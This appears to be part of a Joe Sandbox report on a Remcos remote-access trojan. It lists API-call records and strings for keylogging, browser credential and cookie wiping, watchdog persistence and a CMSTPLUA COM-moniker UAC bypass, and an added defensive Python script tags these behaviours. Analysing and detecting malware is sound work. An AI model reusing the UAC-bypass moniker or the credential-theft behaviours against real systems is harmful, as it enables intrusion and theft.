• CloseHandle.KERNEL32 ref: 004053E7
• CloseHandle.KERNEL32 ref: 004053EF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
• API String ID: 3815868655-81343324
• Opcode ID: d750428f01d036d271b251ec8fd94350236a07052f6e69f1ab6544ab59714425
• Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
• Opcode Fuzzy Hash: d750428f01d036d271b251ec8fd94350236a07052f6e69f1ab6544ab59714425
• Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
APIs
• GetCurrentProcessId.KERNEL32 ref: 00410F45
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
• CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
• CloseHandle.KERNEL32(00000000), ref: 00410F90
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
• String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
• API String ID: 65172268-860466531
• Opcode ID: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
• Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
• Opcode Fuzzy Hash: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
• Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
• FindClose.KERNEL32(00000000), ref: 0040B3CE
• FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
• FindClose.KERNEL32(00000000), ref: 0040B517
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
• FindClose.KERNEL32(00000000), ref: 0040B5CC
• FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
• FindClose.KERNEL32(00000000), ref: 0040B6B2
• FindClose.KERNEL32(00000000), ref: 0040B6D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
• API String ID: 726551946-3025026198
APIs
• OpenClipboard.USER32 ref: 004159C7
• EmptyClipboard.USER32 ref: 004159D5
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
• GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
• IsValidCodePage.KERNEL32(00000000), ref: 0045151E
• IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
• GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
• GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID: u;~/$<D$<D$<D
• API String ID: 745075371-2648512017
APIs
• GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
• GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
• ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
• ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: 8[G
• API String ID: 1888522110-1691237782
                                                                                                                                            • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                            • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object_wcslen
                                                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                            • API String ID: 240030777-3166923314
                                                                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
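                                                                                                                                             The record above is the most security-relevant one in this part of the report: the string `Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}` passed to CoGetObject is the COM elevation moniker for the CMSTPLUA class (ICMLuaUtil), which Windows auto-elevates for a medium-integrity caller without a consent prompt, and the `[+] ucmAllocateElevatedObject` log strings follow the naming used by the UACMe project. As an added example (the editor's own script, not Joe Sandbox output and not Remcos code), the Python below parses function records in the format used on this page and tags each record with the behaviour its API-and-string combination implies: the individual Win32 calls are benign, the signal is in the combination. The `SAMPLE` text is constructed from the records on this page (abridged); the tag rules are editor heuristics and assumptions, not the sandbox's own signatures.

```python
"""Triage helper for Joe Sandbox style function records (editor's added example)."""
import re
from dataclasses import dataclass, field

# Constructed from the records on this page, abridged; bullets, subcall indents
# and the $-separated "String ID" field are kept as the report renders them.
SAMPLE = r"""
APIs
• ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: 8[G
APIs
• _wcslen.LIBCMT ref: 00406788
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
Similarity
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] ucmAllocateElevatedObject${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
Similarity
• String ID: SHDeleteKeyW$Shlwapi.dll
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
Strings
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
"""

# "• Name.MODULE(args), ref: addr", optionally prefixed by "Part of subcall function X:"
API_RE = re.compile(r"^•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.[A-Za-z0-9_]+")
XREF_RE = re.compile(r"^•\s+(.*?),\s*xrefs:\s*[0-9A-Fa-f]+$")   # "• text, xrefs: addr"
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

ELEVATION_MONIKER = "Elevation:Administrator!new:"
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"  # auto-elevated CMSTPLUA / ICMLuaUtil class


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # called API names, in report order
    strings: list = field(default_factory=list)  # Strings section entries plus String ID pieces


def parse_records(text):
    """Split report text into one FunctionRecord per 'APIs' block."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
        elif current is None:
            continue
        elif line in SECTIONS:
            section = line
        elif line.startswith("• String ID:"):
            # '$' separates the strings; empty pieces come from leading or empty entries
            current.strings += [s.strip() for s in line.split(":", 1)[1].split("$") if s.strip()]
        elif section == "APIs" and (m := API_RE.match(line)):
            current.apis.append(m.group(1))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            current.strings.append(m.group(1))
    return records


def calls(rec, *prefixes):
    """True when every prefix matches some called API (prefix match covers A/W/Ex suffixes)."""
    return all(any(a.startswith(p) for a in rec.apis) for p in prefixes)


def tag_record(rec):
    """Heuristic behaviour tags for one record (editor's rules, not sandbox signatures)."""
    tags, blob = [], "\n".join(rec.strings)
    if calls(rec, "CoGetObject") and (ELEVATION_MONIKER in blob or CMSTPLUA_CLSID.lower() in blob.lower()):
        tags.append("uac-bypass: COM elevation moniker for CMSTPLUA")
    if calls(rec, "ToUnicodeEx"):
        tags.append("keylogging: virtual-key to character translation")
    if calls(rec, "OpenSCManager", "EnumServicesStatus"):
        tags.append("discovery: installed services enumerated")
    if calls(rec, "FindFirstFile", "DeleteFile", "RemoveDirectory"):
        tags.append("impact: recursive directory wipe")
    if calls(rec, "DeleteFile") and "Login Data" in blob:
        tags.append("credential-access: Chrome Login Data deleted")
    if calls(rec, "LoadLibrary", "GetProcAddress"):
        resolved = [s for s in rec.strings if not s.lower().endswith(".dll")]  # names looked up at runtime
        tags.append("defense-evasion: runtime API resolution (%s)" % ", ".join(resolved))
    return tags


def triage(text):
    """Tag list for each record in text, in report order."""
    return [tag_record(r) for r in parse_records(text)]


if __name__ == "__main__":
    for i, tags in enumerate(triage(SAMPLE)):
        print(i, tags or ["(no rule matched)"])
```

                                                                                                                                             Run against the six constructed records, the script yields one tag per record: keylogging, UAC bypass, service discovery, recursive deletion, runtime resolution of SHDeleteKeyW, and Chrome credential-store deletion, which line up with the report's "Signatures" entries for CMSTPLUA UAC bypass, keyboard hooking and Chrome password theft. The CLSID check is case-insensitive because the moniker string appears in both cases in the wild; the rules are deliberately conservative (each needs an API combination, not a lone call) so that CRT helpers such as the `__floor_pentium4` and `GetTimeZoneInformation` records on this page produce no tag.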
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3587775597-0
                                                                                                                                            • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                            • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2341273852-0
                                                                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                            • API String ID: 341183262-3780268858
                                                                                                                                            • Opcode ID: 5774cababdb4d5a369a22ab3f87ea2fc2860fa82803dc8691cf41792f4cbf442
                                                                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                            • Opcode Fuzzy Hash: 5774cababdb4d5a369a22ab3f87ea2fc2860fa82803dc8691cf41792f4cbf442
                                                                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$u;~/
                                                                                                                                            • API String ID: 4168288129-1952322618
                                                                                                                                            • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                                            • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                                                                                                            • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                                            • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                            • API String ID: 2127411465-314212984
                                                                                                                                            • Opcode ID: d6f20773c12b8c719fd138cff85b637bba54a7f75e57a90f67b974f823c07467
                                                                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                                            • Opcode Fuzzy Hash: d6f20773c12b8c719fd138cff85b637bba54a7f75e57a90f67b974f823c07467
                                                                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                            APIs
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
